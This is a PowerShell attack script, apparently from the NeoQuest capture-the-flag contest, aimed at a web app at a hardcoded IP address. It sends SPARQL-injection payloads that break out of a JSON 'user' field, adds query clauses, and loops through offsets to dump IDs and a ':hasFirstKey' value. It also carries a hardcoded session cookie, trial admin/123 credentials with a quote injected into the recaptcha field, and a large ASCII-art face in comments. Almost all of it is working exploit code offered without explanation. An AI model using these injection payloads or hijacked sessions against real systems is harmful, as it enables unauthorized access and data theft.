Param(
  
    [Parameter(Mandatory=$False,Position=1)]
    [string] $Payload
)
[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null
$addr = 'http://213.170.91.84/users-db/get-id'
$addr_info = 'http://213.170.91.84/users-db/get-info'
$addr_send = 'http://213.170.91.84/messages-db/send-message'
$addr_logg = 'http://213.170.91.84/auth/logged'
$Cookies = "auth.sid=s%3AFEHAwtM8dsd2EJH7jvmWRjBBTMhOxJjJ.k%2FTkHOqHc3wQtCPcD2GUgZRYDK%2BEQ3lsF%2Fe2XbLpSmQ"
$addr2 = 'http://213.170.91.84/auth/login'
$Data = "{""type"":""getUserInfo"",""user"":""NeoAccountBot'""}"
$Auth = '{"user":"admin","pass":"123","pass2":"123","recaptcha":"' + "'" + '"}'
function Get-POST
{
    Param(      
      
        [Parameter(Mandatory=$True,Position=1)]
        [string] $Uri,     
      
        [Parameter(Mandatory=$False,Position=2)]
        [string] $Content,
        
        [Parameter(Mandatory=$False,Position=3)]
        [string] $Cookie
      
    )
    $content
    try {
        $wc = New-Object system.Net.WebClient
        $wc.Headers.Add("Cookie", $Cookie)
        $wc.Headers.Add("Content-Type", "application/json;charset=UTF-8")

        [byte[]]$byteArray = [System.Text.Encoding]::ASCII.GetBytes($content) 
        $response = $wc.UploadData($uri, "POST", $byteArray)
        [System.Text.Encoding]::ASCII.GetString($response)
    }catch [System.Net.WebException]{
        if ($_.Exception -ne $null -and $_.Exception.Response -ne $null) {
            $errorResult = $_.Exception.Response.GetResponseStream()
            $errorText = (New-Object System.IO.StreamReader($errorResult)).ReadToEnd()
            $errorText
        } else {
            throw $_
        }
    }
}

function Get-POST2
{
    Param(      
      
        [Parameter(Mandatory=$True,Position=1)]
        [string] $Uri,     
      
        [Parameter(Mandatory=$False,Position=2)]
        [string] $Content,
        
        [Parameter(Mandatory=$False,Position=3)]
        [string] $Cookie
      
    )
    $content
    try {
        $wc = New-Object system.Net.WebClient
        $wc.Headers.Add("Cookie", $Cookie)
        $wc.Headers.Add("Content-Type", "application/x-www-form-urlencoded")

        [byte[]]$byteArray = [System.Text.Encoding]::ASCII.GetBytes([System.Web.HttpUtility]::UrlEncode("title=Hello&body="+$content )) 
        $byteArray.Length
        #$wc.Headers.Add("Content-Length", $byteArray.Length.ToString())
        #$wc.Headers.Add("Connection", "keep-alive")
        $response = $wc.UploadData($uri, "POST", $byteArray)
        [System.Text.Encoding]::ASCII.GetString($response)
    }catch [System.Net.WebException]{
        if ($_.Exception -ne $null -and $_.Exception.Response -ne $null) {
            $errorResult = $_.Exception.Response.GetResponseStream()
            $errorText = (New-Object System.IO.StreamReader($errorResult)).ReadToEnd()
            $errorText
        } else {
            throw $_
        }
    }
}
function Get-Get {
    Param(      
      
        [Parameter(Mandatory=$True,Position=1)]
        [string] $Uri,     
        
        [Parameter(Mandatory=$False,Position=2)]
        [string] $Cookie
      
    )
    $content
    try {
        $wc = New-Object system.Net.WebClient
        $wc.Headers.Add("Cookie", $Cookie)
        $wc.DownloadString($uri)
    }catch [System.Net.WebException]{
        if ($_.Exception -ne $null -and $_.Exception.Response -ne $null) {
            $errorResult = $_.Exception.Response.GetResponseStream()
            $errorText = (New-Object System.IO.StreamReader($errorResult)).ReadToEnd()
            $errorText
        } else {
            throw $_
        }
    }
}

#$d1 = '{"type":"getUserInfo","user":"NeoAccountBot :hasId ?id . FILTER> regex(?id, \"^.*\") LIMIT 2  }#"}'
#$d2 = '{"type":"getUserInfo","user":"NeoAccountBot'."'".'"}'
#$req_2 = '3"; <http://neobit.ru/neoquest#xtuker> :hasPrivateDatabase 1 . <http://neobit.ru/neoquest#xtuker> :hasId "xtuker'
$pre = '{"type":"getUserInfo","user":"'
$post = '"}'

#Get-POST $addr ($pre + $Payload + $post) -Cookie $Cookies2

#Get-Get $addr_logg -Cookie $Cookies2
#Get-POST2 $addr_send '3" :hasId "eokfoekoe222' -Cookie $Cookies

0..5 | %{ Get-POST $addr ($pre + " ?id ?trash} limit 1 offset $_ #" + $post) -Cookie $Cookies }

Get-POST $addr ($pre + " :hasFirstKey ?id} #" + $post) -Cookie $Cookies

Get-POST $addr ($pre + " ! " + $post) -Cookie $Cooki    # WTF?! o_O
                                                        # 777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
                                                        # 777777777777777777777777777777777............................................7777777777777777777777
                                                        # 7777777777777777777777777................7777777777777777777777777777777777.....7777777777777777777
                                                        # 7777777777777777777...........7777777777.....777777777777777..7777777777777777...777777777777777777
                                                        # 77777777777777777....77777777777777777777777777777777777777777777..7777777777777...7777777777777777
                                                        # 77777777777777....7777.77......777777777777...77777777777777..777777.777777777777...777777777777777
                                                        # 777777777777....7777777777777777777777777777777777777777777777777..7777.7777777777...77777777777777
                                                        # 77777777777...777777777777.....77777777777777777777.7777777777...777.7777.777777777...7777777777777
                                                        # 7777777777..77777777777.7777777777777777777777777.7777777777777777..777.7777.7777777...777777777777
                                                        # 7777777777..777777777.777777777777.7777777777777777777777777777777777.77.7777.7777777..777777777777
                                                        # 7777777777..77777777.77777777777777777777777777777777777777777777777777.77.77777777777..77777777777
                                                        # 777777777..777777777777777777777777777777777777777777..............7777777777777777777...7777777777
                                                        # 77777777...777777777777........7777777777777777777.....777............77777777777777777...777777777
                                                        # 7777....77777777777..............7777777777777....777777........77...777777777777777777...777777777
                                                        # 777...777.....7...7...............77777777777...77777.................7777.7777........7....7777777
                                                        # 77..777.777777777777777777.............7777777.........77777777777..777.777777777777777777...777777
                                                        # 7..77.777..777777777777777777777....77777777777.....777777...77777777777777..........7777777..77777
                                                        # 7..7.77.777......7777777777777777..7777777777777777777777777....7777777......777777....7777.7..7777
                                                        # 7...77777..........7777.777777777..777777777777777777777777777...........77777..77777...777.77...77
                                                        # 7...77777.7777777........77777777..7777777777777777777777777777777777777777777..777777..777.77...77
                                                        # 7...77.7777777..77....77777777....77777777777777777777777777777777777777777.....7777777..7 7.777..7
                                                        # 7..7777.777777..77777777777....7777777777777777........7777777777777777.....777......77..77.777..77
                                                        # 7....777..77....7777777777.....77777777777777777777..77777777777777......77777...7...7...77.77...77
                                                        # 77..7..77777....7777777..77.....777777777.......777..7777777777.......77777777..777777..777777...77
                                                        # 77...7777.77..7...777.77777777...77777777777777.7...777777........7..7777777....77777..777.77...777
                                                        # 777...77777.........777777777777......777777777777777........777777..7777......777777777..77..77777
                                                        # 7777...7777..7..7......77777777777...77777777777........7777777777...7........7777777.77777...77777
                                                        # 77777..7777....77..77........77777777..............77..7777777777.......77...7777777777.....7777777
                                                        # 77777..7777....77..7777....................7777777777..777777........7777...777777777777...77777777
                                                        # 77777..7777....77..777...7777777..7777777..7777777777...7.........7..777...77777777777...7777777777
                                                        # 77777..7777........777..77777777..7777777..777777777...........7777..77...77777777777...77777777777
                                                        # 77777..7777.................................................7777777......777777777777..777777777777
                                                        # 77777..7777........................................7777..77777777777...7777777777777...777777777777
                                                        # 77777..77777....................................7777777..777777777...77777777777777...7777777777777
                                                        # 77777..77777...........................7777..7777777777...77777....777777777777777...77777777777777
                                                        # 77777..777777.7..777..777...77777..77777777..77777777777..777....777777777777777...7777777777777777
                                                        # 77777..777777..7..777..777..77777..77777777..777777777777......7777777777777777...77777777777777777
                                                        # 77777..7777777..7..777..77...7777..77777777..777777777......7777777.77777.777...7777777777777777777
                                                        # 77777..777777777...777...77..7777...7777777..77.........77777777.77777..777....77777777777777777777
                                                        # 77777..77777777777..................................777777777..7777..7777.... 777777777777777777777
                                                        # 7777...77777777.777777777777777777777777777777777777777777.77777..7777.....777777777777777777777777
                                                        # 7777..7777777777.777777777777777777777777777777777777..777777.77777.....777777777777777777777777777
                                                        # 7777..777777777777.777777777777777777777777777777..777777..77777.....777777777777777777777777777777
                                                        # 77..77777..77777777...77777777777..........777777..7777777......77777777777777777777777777777777777
                                                        # 7..777777777.7777777777777777777777777...777777777777.....77777777777777777777777777777777777777777
                                                        # 7...7777777777...............777777777777777777777.....77777777777777777777777777777777777777777777
                                                        # 7...777777777777777777777777777777777777777777.....777777777777777777777777777777777777777777777777
                                                        # 77...77777777777777777777777777777777777..7.....777777777777777777777777777777777777777777777777777
                                                        # 777....7777777777777777777777777777..........777777777777777777777777777777777777777777777777777777
                                                        # 7777.....7777777777777777777.........77777777777777777777777777777777777777777777777777777777777777
                                                        # 7777777........................77777777777777777777777777777777777777777777777777777777777777777777
                                                        # 777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777